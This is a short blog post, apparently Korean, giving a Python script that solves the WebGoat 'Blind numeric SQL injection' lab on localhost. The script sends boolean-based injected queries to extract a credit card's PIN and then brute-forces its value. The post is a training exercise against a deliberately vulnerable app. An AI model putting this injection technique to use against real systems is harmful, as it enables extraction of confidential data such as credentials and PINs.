Blind numeric sql injection

Python/Webgoat

Blind numeric sql injection

JAEJUNG 2021. 9. 2. 16:29

import requests

url = 'http://localhost:8080/WebGoat/attack?Screen=586116895&menu=1100'
headers={'Content-Type' : 'application/x-www-form-urlencoded;'} 
cookie = {'JSESSIONID' : '758026477EFE927534DDA6CCB9F2058A'}

words= "101 and (select pin from pins where cc_number = '1111222233334444') >"

for k in range(1,10):
    data={'account_number' : words + str(10**k), 'SUBMIT': 'GO!'}
    res=requests.post(url, data=data, cookies=cookie)
    if 'Account number is valid' in res.text:
        continue
    if 'Invalid' in res.text:
        index=str(k)
        break

index=int(index)

for i in range(0, 10**index):
    data={'account_number' : words+str(i), 'SUBMIT': 'GO!'}
    res=requests.post(url, data=data, cookies=cookie)
    if 'Account number is valid' in res.text:
        continue
    if 'Invalid' in res.text:
        save=i
        break
    
print(save)

저작자표시

'Python > Webgoat' 카테고리의 다른 글

Blind string injection (0)	2021.09.02

현재글Blind numeric sql injection

JWS

Blind numeric sql injection

'Python > Webgoat' 카테고리의 다른 글

'Python/Webgoat'의 다른글

티스토리툴바

Blind numeric sql injection

'Python > Webgoat' 카테고리의 다른 글

'Python/Webgoat'의 다른글

관련글

티스토리툴바